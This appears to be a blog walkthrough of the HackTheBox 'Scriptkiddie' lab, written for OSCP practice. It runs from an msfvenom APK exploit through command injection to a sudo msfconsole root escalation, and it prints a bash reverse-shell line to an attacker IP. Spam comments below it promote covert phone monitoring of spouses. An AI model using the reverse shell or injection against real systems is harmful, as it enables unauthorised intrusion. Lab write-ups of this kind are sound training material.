OSCP PREPROTİONS – HTB Scriptkiddie

Scriptkiddie machine is a vulnerable machine with Linux operating system among retired machines. By using these vulnerabilities, it expects us to obtain user and root flags.
To recognize the target machine, we first perform a network scan with nmap.
Classic Scan

Port scanning shows that 22/tcp ssh OpenSSH 8.2p1 and 5000/tcp http Werkzeug ports are open. Since there is no vulnerability on the ssh port, we continue the enumeration on port 5000.
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Let’s do a search on the port
(Werkzeug: Werkzeug is a comprehensive WSGI web application library. WSGI (Web Server Gateway Interface) is a specification that describes how a web server communicates with web applications and how web applications can be chained together to process a request. https://werkzeug.palletsprojects.com/en/2.3.x/)

There are nmap, payloads, sploits options, we tested these options and they work. We checked with gobuster to see if there are any different directories or files.

The directory search yielded no results, so we are focusing entirely on the Werkzeug side.
We realized that there are nmap, searchploit and msfvenom tools here.
We are looking from searcsploit to see if there is a vulnerability on msfvenom on their web side.

We understand that there is a vulnerability related to Msfvenom, let’s create shelli from our attacker machine here

We change the payload part of the exploiti code we saved with nano, here we will run our Shell file on the other side.

We have edited the payload part, next is the creation of the exploit

We created the exploit and moved it to our main folder as evil.apk
After moving evil.apk to the main folder, let’s create the Shell.sh file in payloaf

Our shell file has been created, now let’s serve a web server with pyhon so that we can access our exploit evila.pk

As we can see our shell was taken and gave us revershell

Here we got our user flag.
Let’s provide privilege escalation when we don’t have access to /root directory

To raise authorization on the machine we are providing local enumeration first

find / -perm -u=s -type f 2>/dev/null
find /pwn -perm -u=s -type f 2>/dev/null
commands to see what files are in there under root privileges.

/home/pwn/scanlosers.sh file draws our attention, let’s see what’s in it

Here command injection is expected to be done, we cut -f3 kouts tell us that the first 6 characters are cut and then this command is executed.
We will give the appropriate revershell
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.13/4723 0>1
We use the command.

The purpose of using # here is to make all commands after # a comment line.
After running this command, we have shell from user pwn

Again we did not have root access. We provide local enumeration to perform privilege escalation again.
We run sudo -l to see who has sudo privileges

Here msfconsole is running under sudo authorization.
Let’s see how we can run it with root privileges by gtobins

Using /bin/bash commands, we have root privileges.

Here we got the root flag.

Comments

  1. Szpiegowskie Telefonu

    Czy jest jakiś sposób na odzyskanie usuniętej historii połączeń? Osoby posiadające kopię zapasową w chmurze mogą użyć tych plików kopii zapasowych do przywrócenia zapisów połączeń telefonicznych.

  2. Szpiegowskie Telefonu

    Gdy podejrzewamy, że nasza żona lub mąż zdradził małżeństwo, ale nie ma na to bezpośrednich dowodów lub chcemy się martwić o bezpieczeństwo naszych dzieci, dobrym rozwiązaniem jest również monitorowanie ich telefonów komórkowych, które zazwyczaj pozwala na uzyskanie ważniejszych informacji.

  3. Gutoptim review

    Thank you for sharing excellent informations. Your site is so cool. I am impressed by the details that you have on this website. It reveals how nicely you understand this subject. Bookmarked this web page, will come back for more articles. You, my friend, ROCK! I found just the information I already searched everywhere and just couldn’t come across. What an ideal site.

  4. Java Burn

    Hi there! This post couldn’t be written any better! Reading through this post reminds me of my previous room mate! He always kept talking about this. I will forward this article to him. Pretty sure he will have a good read. Thank you for sharing!

  5. cbd weed switzerland

    Its like you read my mind! You seem to know so much about this, like you wrote the book in it or something. I think that you could do with some pics to drive the message home a little bit, but instead of that, this is excellent blog. A fantastic read. I’ll definitely be back.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir